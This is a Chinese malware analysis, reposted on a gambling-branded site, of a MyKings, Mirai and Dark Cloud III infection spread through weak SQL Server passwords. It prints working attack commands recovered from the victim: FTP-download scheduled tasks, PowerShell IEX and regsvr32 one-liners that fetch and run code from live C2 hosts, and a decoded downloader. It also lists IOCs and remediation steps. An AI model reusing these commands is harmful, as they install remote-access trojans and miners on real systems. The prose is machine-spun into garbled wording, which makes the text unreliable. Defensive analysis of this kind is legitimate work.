对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

申博_新闻事件 申博 438次浏览 已收录 0个评论

知识点

MyKings

MyKings是一个大规模多重僵尸收集,并装置门罗币挖矿机,应用效劳器资本挖矿。

概述

挖矿进击称号 MyKings
触及平台 Windows平台
相干歹意代码家属 DDoS、Proxy、RAT、Mirai
进击进口 经由历程扫描开放端口,应用破绽和弱口令举行入侵
相干破绽及编号 永久之蓝
形貌简介 MyKings 是一个由多个子僵尸收集组成的多重僵尸收集,2017 年 4 月尾以来,该僵尸收集一向积极地扫描互联网上 1433 及其他多个端口,并在渗入进入受害者主机后流传包孕 DDoS、Proxy、RAT、Miner 在内的多种分歧用处的歹意代码。

1.进击历程逻辑:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

图-进击历程

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

图-Payload实行历程

2.病毒各局部功用:

文件名 功用
c.bat 封闭端口
item.dat 远控木马主体DLL
J剧本(硬编码在Payload中) 完毕指定历程,删除文件,运转item.dat
cmd批处理剧本(Payload联网猎取到内存中) 完毕指定历程,删除文件,删除指定账户运转c.bat 、item.dat

表-各局部功用

排查思绪

1.进击者应用SQL Server 弱暗码举行暴力入侵体式格局入侵Windows体系后,会植入木马下载器conhost.exe(原始文件名ups.exe),该顺序启动后会起首接见歹意链接http://ok.mymyxmra.ru以猎取第二阶段歹意代码的下载地点。 

依据C:/Windows/System32/b.txt发生的老的衔接状况日记发明有大批外发扫描1433端口推断多是经由历程SQL Server弱暗码进来的。

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

C:/Windows/Temp/conhost.exe源始文件名ups.exe:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析2.查找非常历程

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

3.查找非常效劳

效劳名xWinWpdSrv

映像门路C:/Windows/system/msinfo.exe -s -syn 1000

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

扫描目的IP地点:天生机制愈来愈庞杂

初期版本中, msinfo.exe用来扫描的目的IP只要两种:从云端设置装备摆设文件wpd.dat猎取、在当地依据外网出口IP随机天生;

最新样本中,增加了一种更庞杂的当地随机天生算法,并且会避开一批保存地点段。

中心木马msinfo.exe用到的云端设置装备摆设文件wpd.dat ,是一个加密的XML文档,个中指定了暴破胜利后用到来下载Mirai样本的C2地点、须要扫描的收集效劳端口、暴破各个端口所需的口令、入侵各个收集效劳时实行的局部敕令和须要扫描的目的IP局限等设置装备摆设。这些设置装备摆设都能够依据后继僵尸收集的要求天真变动。

模块化编程架构的msinfo.exe:主若是其Crack模块中经由历程继承一个基类Task_Crack,完成个中界说好的一组衔接、暴破、实行敕令等功用的函数接口便可界说一个Task_Crack_XXX子类,继而完成针对一个新的收集效劳的进击模块Crack模块与wpd.dat设置装备摆设文件中界说的待扫描收集效劳端口相对应,能够天真变动针对分歧收集效劳的Crack功用。

其他辅佐云端设置装备摆设文件:msinfo.exe用到的别的一个辅佐木马ups.exe ,会触及别的云端设置装备摆设文件。这些也都能够天真设置装备摆设,轻易进击者控制鄙人一阶段须要下载甚么样本、实行甚么样的敕令。

4.查找非常计划任务                                         

称号 启动顺序  触发器
my1 c:/windows/system/my1.bat  天天12点实行
Mysa cmd.exe >/c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye  体系启动实行
Mysa1 rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa 体系启动实行
Mysa2 cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p 体系启动实行
ok rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa 体系启动实行

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

加载远控木马:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析5.查找非常启动项

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

6.查找非常防火墙和当地平安战略    

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

木马文件设置装备摆设防火墙战略,封闭135、137、138、139、445端口,防备再被其他病毒沾染。

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

7.查找非常目次&文件

C:/Windows/debug目次,门罗币挖矿相干的模块和设置装备摆设文件:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

门罗币设置装备摆设config.json

矿池url:”pool.minexmr.com:5555″

钱包地点:

4862mTLmCo9LGqn3XUrV9xaEfzgNPid7AM26XpeWWm4nfEtPfV9Eb1k2xYaYWRyM6LYETJkF3RCqF5JX5dQWEi3hNNE36C6

pass:”x”

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

C:/Windows/Help目次:
对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

C:/Windows/system目次。

msinfo.exe病毒母体经由历程注册效劳&写入歹意代码到数据库的手腕,完成耐久化进击,会衔接云端,自动更新病毒,实时下载最新的进击模块。
对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

C:/Windows/system32体系敕令目次。

b.txt 端口衔接状况;

a.exe重要功用是完成消灭可疑木马历程和启动DiskWriter远控木马item.dat;

csrse.exe原始文件ups.exe:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

C:/Windows/Temp临时文件目次,被注入的病毒代码实行歹意逻辑重要参照从C&C效劳器要求到的设置装备摆设文件,该文件开释到当地后门路为:%SystemRoot%\Temp\ntuser.dat。该文件被异或0×95加密过,在运用该文件时会对文件举行解密。

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

解密后的ntuser.dat设置装备摆设内容,以下图所示:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

ntuser.dat设置装备摆设内容整体分为两个局部:main和update。main局部中的一切ip和网址用来下载后门病毒相干设置装备摆设,update局部中的ip和网址用来更新ntuser.dat设置装备摆设数据,要求到的相干设置装备摆设信息至今依旧在延续更新。下载后门病毒设置装备摆设信息cloud.txt的代码逻辑。

下载后门病毒设置装备摆设信息

要求到的设置装备摆设信息中,除后门病毒下载地点(exe键名对应数据)外,另有名为url的设置装备摆设项,该功用开启后会hook CreateProcessW挟制浏览器启动参数,但现阶段该功用还没有被开启。设置装备摆设信息,以下图所示:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

设置装备摆设信息

歹意代码会经由历程上图中的下载地点,将后门病毒下载到%SystemRoot%\Temp\conhost.exe目次举行实行。下载实行长途后门病毒相干逻辑。

下载实行后门病毒

Backdoor/Voluminer

该病毒运转后,起首会开释寄存有C&C效劳器列表的文件(xp.dat)至C:\Program Files\Common Files目次中,之后向C&C效劳器列表中的效劳器地点要求xpxmr.dat文件,用于更新C&C效劳器列表。要求到的xpxmr.dat文件数据运用RSA算法举行过加密,举行解密后会从新写入到xpxmr.dat文件中,该文件为明文寄存。

更新C&C效劳器列表

病毒在运转中会向C&C效劳器要求猎取最新病毒版本号,当检测到存在新版本时,则会经由历程C&C效劳器下载实行最新版本的病毒顺序。当后门病毒发明以后体系为64位体系时,还会向C&C效劳器要求64位版本的后门病毒到当地举行实行。

要求64位版本病毒

随后,病毒会运用地点列表中的C&C效劳器地点下载挖矿所需的病毒组件,临时我们发明会被病毒下载至当地病毒仅具有挖矿功用,但我们不消除其将来会下载其他病毒模块的可能性。病毒鄙人载文件后,会对病毒组件举行md5校验,病毒组件的md5值会参考C&C效劳器中的md5.txt文件内容。

在该目次下有个以本机ip定名的txt文件

内容以下 :         

--------------------------------------------------------         

门路:C:\Windows\Temp\conhost.exe

敕令行:C:\Windows\Temp\conhost.exe                      

门路:C:\Windows\SysWOW64\cmd.exe

敕令行:cmd /c ""C:\windows\web\c3.bat" "

门路:C:\Windows\SysWOW64\cacls.exe

敕令行:cacls  c:\windows\temp\docv8.exe/e /d system

门路:C:\Windows\system32\csrse.exe

敕令行:"C:\Windows\system32\csrse.exe" 

门路:c:\windows\system\msinfo.exe

敕令行:c:\windows\system\msinfo.exe -s -syn 1000

门路:c:\windows\debug\lsmo.exe

敕令行:c:\windows\debug\lsmo.exe 

门路:C:\Windows\System32\cmd.exe

敕令行:"C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n 6 & taskkill -f /im lsmose.exe & c:\windows\debug\lsmose.exe

门路:c:\windows\debug\lsmose.exe

敕令行:c:\windows\debug\lsmose.exe

门路:C:\Windows\system32\cmd.exe

敕令行:cmd /c powershell.exe -nop -enc JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAA6ADgAOAA4ADgALwAyAC4AdAB4AHQAIgApAC4AdAByAGkAbQAoACkAIAAtAHMAcABsAGkAdAAgACIAWwBcAHIAXABuAF0AKwAiAHwAJQB7ACQAbgA9ACQAXwAuAHMAcABsAGkAdAAoACIALwAiACkAWwAtADEAXQA7ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAF8ALAAgACQAbgApADsAcwB0AGEAcgB0ACAAJABuADsAfQA=&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host:8888/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll

门路:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

敕令行:powershell.exe  IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')

--------------------------------------------

备注

加载远控木马,64base编码解码后取得:

$ w c = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ w c . D o w n l o a d S t r i n g ( " h t t p : / / w m i . 1 2 1 7 b y e . h o s t : 8 8 8 8 / 2 . t x t " ) . t r i m ( )   - s p l i t   " [ \ r    \ n ] + " | % { $ n = $ _ . s p l i t ( " / " ) [ - 1 ] ; $ w c . D o w n l o a d F i l e ( $ _ ,   $ n ) ; s t a r t   $ n ; }  

应用regsvr32实行长途剧本敕令  /u /s /i: http://wmi.1217bye.host:8888/1.txt scrobj.dll 该txt文件为一个长途js剧本,js剧本里的字符都被用16进制举行替代,解密后的js剧本,其重要功用是下载木马文件并实行。

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析解密后的长途剧本,Upsnew2开释远控木马item.dat和c3.bat剧本。

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DV6W313X   

ie临时文件目次下upsnew2[1].exe,原始文件名ups.exe:对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

txt最下面是用mimikatz取得的体系明文暗码:

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

下载Invoke-Mimikatz.ps1剧本:对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

要完毕的历程列表:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

C:/Windows/Web目次:
对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析c3.bat剧本功用以下:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

C:\Program Files\Common Files目次下:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析C:/Program Files/目次下:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析C:/Windows/SysWOW64目次下,wpd.dat扫描的目的IP从云端设置装备摆设文件:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

C:/Windows/taidbox/mbrbackup.bin,暗云III v3.0:

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析

暗云III v3.0其线程回调例程实行流程以下:

a)挪用RtlInitUnicodeString初始化csrss.exe;

b)查找历程csrss.exe,检测到csrss.exe后则继承下一步;

c)沾染MBR,并珍爱1到62扇区的数据,若是试图读前62扇区的数据则会返回一般的数据,若是试图写前62扇区的数据则返回写入的数据举行诳骗,现实没有被写入;

d)挪用CreateSystemThread建立体系线程,该线程函数重要完成了shellcode下载实行等功用,可拉取恣意功用歹意代码举行实行。

解决方案

1.断绝沾染主机:已中毒计算机尽快断绝,封闭一切收集衔接,禁用网卡;

2.割断流传门路:从僵尸收集以后的进击重点来看,提防其经由历程1433端口入侵计算机黑白常有须要的。另外,Bot顺序另有多种进击体式格局还没有运用,这些进击体式格局可能在将来的某一天被开启,因而也须要提防可能发生的进击;

3.查找进击源:加固SQL Server效劳器,修补效劳器平安破绽。运用平安的暗码战略,运用高强度暗码,切勿运用弱口令,防备黑客暴力破解,禁用sa账号;

4.查杀病毒:运用管家急救箱举行查杀,下载网址:

http://dlied6.qq.com/invc/xfspeed/qqpcmgr/other/SystemAidBoxPro.zip ;

5.修补破绽:特别注重445端口的开放状况,若是不须要运用Windows局域网同享效劳,能够经由历程设置防火墙划定规矩来封闭445等端口,并实时打上永久之蓝MS17-010等破绽相干补钉;

6.注重MSSQL,RDP,Telnet等效劳的弱口令题目;

7.注重体系账户状况,禁用不须要的账户。

参考

1.具有多病毒功用!MiraiXMiner物联网僵尸收集进击来袭

2.歹意挖矿进击的近况、检测及措置

3.MyKings:一个大规模多重僵尸收集

4.【木马剖析】悄悄兴起的挖矿机僵尸收集:打效劳器挖代价百万门罗币

5.MyKings僵尸收集最新变种突袭,进击代码屡次加密殽杂,难以检测 

6.弱口令爆破SQL Server效劳器 暗云、Mykings、Mirai多个病毒家属结伴来袭 

7.暗云系列Bootkit木马最新动态

8.MyKing黑产团伙最新挖矿运动暴光 

9.中国黑客应用“永久之蓝”搜索肉鸡构建僵尸收集 

10.僵尸收集“Mykings” 

11.“藏匿者”病毒团伙手艺晋级流传病毒 暴力入侵电脑要挟全网用户 

12.完全暴光黑客构造“藏匿者”:现在作歹最多的收集进击团伙 

13.代码战役的主阵地——来自终端的要挟谍报胪陈.pdf 

14.【木马剖析】剖析应用“永久之蓝”破绽流传的RAT 

域名

127.0.0.1  ftp.ftp0930.host

127.0.0.1  pool.minexmr.com

127.0.0.1  raw.githubusercontent.com

127.0.0.1  wmi.1217bye.host

127.0.0.1  down.mysking.info

127.0.0.1  js.ftp0930.host

127.0.0.1  js.mykings.top

127.0.0.1  ftp.ftp0118.info

127.0.0.1  ok.mymyxmra.ru

127.0.0.1  mbr.kill0604.ru

ip

173.208.139.170

35.182.171.137

45.58.135.106

103.213.246.23

78.142.29.152

74.222.14.61

18.218.14.96

223.25.247.240

223.25.247.152

103.95.28.54

23.88.160.137

81.177.135.35

78.142.29.110

174.128.239.250

66.117.6.174

暗云III v3.0 、Mykings、Mirai木马样本已放到网盘供进修。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明对黑云III v3.0、Mykings、Mirai等几种病毒家族成员的攻击进行了实战分析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址